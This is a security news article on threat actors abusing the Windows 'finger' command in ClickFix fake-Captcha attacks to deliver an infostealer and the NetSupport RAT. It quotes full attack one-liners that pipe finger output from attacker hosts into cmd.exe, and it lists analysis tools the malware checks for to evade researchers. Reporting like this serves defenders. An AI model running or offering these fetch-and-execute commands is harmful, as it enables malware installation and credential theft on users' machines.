The decades-old “finger” command is making a comeback,, with threat actors using the protocol to retrieve remote commands to execute on Windows devices.

In the past, people used the finger command to look up information about local and remote users on Unix and Linux systems via the Finger protocol, a command later added to Windows. While still supported, it’s rarely used today compared to its popularity decades ago.

When executed, the finger command returns basic information about a user, including their login name, name (if set in /etc/passwd), home directory, phone numbers, last seen, and other details.

Recently, there have been malicious campaigns utilizing the Finger protocol in what appear to be ClickFix attacks that retrieve commands to execute on devices.

This is not the first time the finger command has been abused in this way, as researchers warned in 2020 that it was used as a LOLBIN to download malware and evade detection.

Abusing the finger command

Last month, cybersecurity researcher MalwareHunterTeam shared a batch file [VirusTotal] with BleepingComputer that, when executed, would use the “finger root@finger.nateams[.]com” command to retrieve commands from a remote finger server, which were then run locally by piping them through cmd.exe.

While that host is no longer accessible, MalwareHunterTeam found additional malware samples and attacks utilizing the finger command.

For example, a person on Reddit recently warned that they fell victim to a ClickFix attack that impersonated a Captcha, prompting them to run a Windows command to verify they were human.

“I just fell for verify you are human win + r. What do I do?,” reads the Reddit post.

“I was in a rush and fell for this and ended up entering the following in my cmd prompt:”

“cmd /c start “” /min cmd /c “finger vke@finger.cloudmega[.]org | cmd” && echo’ Verify you are human–press ENTER'”

Although the host is no longer responding to finger requests, another Reddit user captured the output.

This attack abuses the Finger protocol as a remote script delivery method, by running finger vke@finger.cloudmega[.]org and piping its output through the Windows command processor, cmd.exe.

This causes the retrieved commands to be executed, which creates a random-named path, copies curl.exe to a random filename, uses the renamed curl executable to download a zip archive disguised as a PDF [VirusTotal] from cloudmega[.]org, and extracts a Python malware package.

The Python program will then be executed using pythonw.exe __init__.py.

The final command executed is a call back to the attacker’s server to confirm execution, while displaying a fake “Verify you are human” prompt to the user.

It is unclear what the purpose of the Python package is, but a related batch file indicates it was an infostealer.

MalwareHunterTeam also found a similar campaign that uses “finger Kove2@api.metrics-strange.com | cmd” to retrieve and run commands almost identical to the previously mentioned ClickFix attack.

BleepingComputer found this to be a more evolved attack, with the commands looking for tools commonly used in malware research and exiting if found. These tools include filemon, regmon, procexp, procexp64, tcpview, tcpview64, Procmon, Procmon64, vmmap, vmmap64, portmon, processlasso, Wireshark, Fiddler, Everywhere, Fiddler, ida, ida64, ImmunityDebugger, WinDump, x64dbg, x32dbg, OllyDbg, and ProcessHacker.

If no malware analysis tools are found, the commands will download a zip archive disguised as PDF files and extract it. However, instead of extracting a malicious Python package from the fake PDF, it extracts the NetSupport Manager RAT package.

The commands will then configure a scheduled task to launch the remote access malware when the user logs in.

While the current ‘finger’ abuse appears to be carried out by a single threat actor conducting ClickFix attacks, as people continue to fall for them, it is essential to be aware of the campaigns.

For Defenders, the best way to block the use of the finger command is to block outgoing traffic to TCP port 79, which is what is used to connect to a daemon over the Finger protocol.